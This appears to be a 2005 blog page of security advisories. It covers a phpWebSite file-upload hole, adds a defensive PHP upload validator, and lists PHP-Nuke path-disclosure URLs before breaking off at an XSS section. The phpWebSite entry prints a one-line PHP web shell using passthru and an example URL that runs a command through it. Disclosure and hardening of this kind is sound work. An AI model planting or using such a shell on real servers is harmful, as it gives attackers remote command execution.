Sunday, March 06, 2005
PHP include in phpWebSite
Summary:
Anyone who has permission to add announcements can upload a PHP script as a .gif file and execute it.
Example:
http://[target]/images/announce/[anyname].gif.php?nst=ls -la
Where [anyname].gif.php is a PHP script containing this line:
passthru($_GET[nst]);
Vulnerable Systems:
Official Website: phpWebSite
phpWebSite <= 0.10.0
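A server-side check that would reject the [anyname].gif.php upload described above, as an added example (not phpWebSite's own code). The function name safe_image_name and the sample file names are hypothetical, and the 1x1 GIF is constructed sample input.

```php
<?php
// Added example: hypothetical helper, not taken from phpWebSite.
// Returns a server-generated file name for an uploaded image, or null if rejected.
function safe_image_name(string $clientName, string $tmpPath): ?string
{
    // Detected image type => the only extension that will ever be written to disk.
    $allowed = [
        IMAGETYPE_GIF  => 'gif',
        IMAGETYPE_JPEG => 'jpg',
        IMAGETYPE_PNG  => 'png',
    ];

    // The final extension decides how the web server handles the file,
    // so "name.gif.php" is judged as ".php", not ".gif".
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if (!in_array($ext, ['gif', 'jpg', 'jpeg', 'png'], true)) {
        return null;
    }

    // Inspect the content itself; the client-supplied MIME type is not trusted.
    $info = @getimagesize($tmpPath);
    if ($info === false || !isset($allowed[$info[2]])) {
        return null;
    }

    // Discard the client name: random base name, extension derived from content.
    return bin2hex(random_bytes(16)) . '.' . $allowed[$info[2]];
}

// Constructed sample input: a 1x1 GIF written to a temporary file.
$gif = base64_decode('R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7');
$tmp = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($tmp, $gif);

// Case 1: image content with an image extension.
var_dump(safe_image_name('photo.gif', $tmp));
// Case 2: the double extension from the advisory.
var_dump(safe_image_name('photo.gif.php', $tmp));
// Case 3: image extension, but the content is not an image.
file_put_contents($tmp, 'plain text, not an image');
var_dump(safe_image_name('photo.gif', $tmp));

unlink($tmp);
```

Configuring the web server so that the upload directory never executes scripts is a complementary layer to this check.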
Multiple Vulnerabilities in PHP-Nuke (db.php, index.php, Downloads, Web_Links)
Summary
PHP-Nuke is "a popular open source content management system, written in PHP by Francisco Burzi. This CMS is used on many thousands websites, because it's freeware, easy to install and manage and has broad set of features".
Multiple vulnerabilities were found in PHP-Nuke that result in Path Disclosure and Cross Site Scripting.
Credit:
The information has been provided by Janek Vind.
The original article can be found at: waraxe.us
Details
Vulnerable Systems:
* PHP-Nuke version 6.0 up to version 7.6
Path Disclosure:
There are several path disclosure issues in PHP-Nuke, triggered when any of the following sample URLs is accessed:
http://localhost/nuke75/db/db.php
http://localhost/nuke75/index.php?inside_mod=1
http://localhost/nuke75/modules.php?name=Downloads&d_op=menu
http://localhost/nuke75/modules.php?name=Web_Links&l_op=menu
Cross Site Scripting
There are two parameters in the modules.php file that are vulnerable to Cross Site Scripting attacks: